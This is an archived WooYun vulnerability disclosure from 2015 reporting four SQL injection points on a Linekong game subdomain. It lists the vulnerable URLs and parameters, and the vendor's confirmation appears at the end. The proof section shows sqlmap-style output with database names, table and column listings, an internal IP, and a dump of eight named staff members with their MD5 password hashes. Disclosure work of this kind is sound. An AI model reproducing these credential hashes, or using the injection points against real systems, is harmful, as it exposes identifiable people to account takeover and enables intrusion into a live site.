当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138829

漏洞标题:蓝港某一重要分站SQL注入打包

相关厂商:linekong.com

漏洞作者: 路人甲

提交时间:2015-09-04 14:46

修复时间:2015-10-21 10:48

公开时间:2015-10-21 10:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-04: 细节已通知厂商并且等待厂商处理中
2015-09-06: 厂商已经确认,细节仅向厂商公开
2015-09-16: 细节向核心白帽子及相关领域专家公开
2015-09-26: 细节向普通白帽子公开
2015-10-06: 细节向实习白帽子公开
2015-10-21: 细节向公众公开

简要描述:

上个首页
打包,求给20RANK

详细说明:

四处SQL注入
SQL注入一:

http://yt.linekong.com/article.php?article_id=*
注入点article_id


SQL注入二:

http://yt.linekong.com/lookvote.php?vote_id=*
vote_id参数存在注入


SQL注入三:

http://yt.linekong.com/reporter.php?serverName=%D5%CC%BD%A3%B3%A4%B8%E8&sort_id=*
sort_id参数存在注入


SQL注入四:

http://yt.linekong.com/voting.php?types=radio&vote_id=*
vote_id参数存在SQL注入


漏洞证明:

web application technology: Apache
back-end DBMS: MySQL 5.0.12
current user: 'ytweb@172.16.9.64'
current database: 'yt_web'
current user is DBA: False
available databases [2]:
[*] infm
[*] yt_web
Database: yt_web
[85 tables]
+----------------------------------+
| jd_activity_0527_info |
| jd_activity_0527_log |
| jd_activity_certified_phone |
| jd_activity_fanpai_card |
| jd_activity_fanpai_log |
| jd_activity_lover_binding_log |
| jd_activity_lover_getkey_log |
| jd_activity_newserver_log |
| jd_activity_renzheng_log |
| jd_activity_spread_log |
| jd_activity_spread_playLog |
| jd_activity_spread_receive |
| jd_activity_spread_register |
| jd_activity_spread_relationship |
| jd_activity_spread_spreader |
| jd_activity_tanabata_binding_log |
| jd_activity_tanabata_getkey_log |
| jd_activity_tuiguang_child |
| jd_activity_tuiguang_log |
| jd_activity_tuiguang_parent |
| jd_activity_whcltuiguang_child |
| jd_activity_whcltuiguang_log |
| jd_activity_whcltuiguang_parent |
| jd_address |
| jd_article |
| jd_article_inserl |
| jd_build |
| jd_cdkey_zzdjk |
| jd_cdkey_zzdjk_count |
| jd_channel |
| jd_columns |
| jd_comment |
| jd_dcj_temp |
| jd_demo |
| jd_download |
| jd_editors_inserl |
| jd_flash |
| jd_grading |
| jd_group |
| jd_image |
| jd_image_inserl |
| jd_lottery_20091201_cdkey |
| jd_lottery_20091201_log |
| jd_lottery_codekey |
| jd_lottery_codekey_click_log |
| jd_lottery_codekey_log |
| jd_lottery_getItem |
| jd_lottery_paytop |
| jd_lottery_paytop_cdkey |
| jd_member |
| jd_passportstat |
| jd_ploy_vote |
| jd_ploy_vote_cdkey |
| jd_sort |
| jd_temp_belle_friend |
| jd_temp_belle_user |
| jd_temp_huapi |
| jd_temp_quiz |
| jd_temp_tong |
| jd_temp_torch_base |
| jd_temp_torch_id |
| jd_temp_torch_rank |
| jd_temp_torch_user |
| jd_temp_torch_user_bak |
| jd_temp_user815 |
| jd_temp_wjdcwj |
| jd_tempprops |
| jd_tempprops_15 |
| jd_tempprops_20091115 |
| jd_tempprops_20091216 |
| jd_tempprops_20100108 |
| jd_tempprops_2_res |
| jd_tempprops_3 |
| jd_tempprops_5 |
| jd_tempprops_res |
| jd_types |
| jd_url |
| jd_url_inserl |
| jd_vote |
| jd_vote_inserl |
| jd_vote_option |
| jd_wj_article |
| jd_wj_article_inserl |
| jd_wj_image |
| jd_wj_image_inserl |
+----------------------------------+
Database: yt_web
Table: jd_member
[26 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| address_id | int(11) |
| article_id | int(11) |
| group_id | int(11) |
| id | int(11) |
| image_id | int(11) |
| nickname | varchar(64) |
| uadd_time | datetime |
| url_id | int(11) |
| user_age | date |
| user_Dreply | int(11) |
| user_Dtopic | int(11) |
| user_email | varchar(32) |
| user_grading | varchar(64) |
| user_jointime | datetime |
| user_like | varchar(255) |
| user_movephone | varchar(32) |
| user_msn | varchar(128) |
| user_name | varchar(32) |
| user_passwd | varchar(32) |
| user_perfect | int(11) |
| user_qq | int(11) |
| user_sex | int(2) |
| user_state | int(2) |
| user_Treply | int(11) |
| user_Ttopic | int(11) |
| vote_id | int(11) |
+----------------+--------------+
Database: fr_web
Table: fr_member
[8 entries]
+-----------+----------------------------------+
| user_name | user_passwd |
+-----------+----------------------------------+
| 董勇 | 862f3760ca3293437b53cac01b0ffe29 |
| 实习生 | 003be2507cfad94f1efb32fe3fd0d0ec |
| 王磊 | e10adc3949ba59abbe56e057f20f883e |
| 刘志刚 | 30fed3a8f7747d5b55707b5ebfe4dc77 |
| 运维值班工程师 | cbef2ead7978557272b0c692f356b3cd |
| 李治 | cd9dac6dbb33988a3214e7ba85d272fc |
| 张静 | b1d8fcdf6d0db7011c71fc30e7aef4a4 |
| 韩秋莹 | 2f090f77c0d55fdf508e324140050160 |
+-----------+----------------------------------+

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-06 10:46

厂商回复:

该项目已经计划下线,感谢指出的问题。
已交由开发人员处理

最新状态:

暂无


漏洞评价:

评论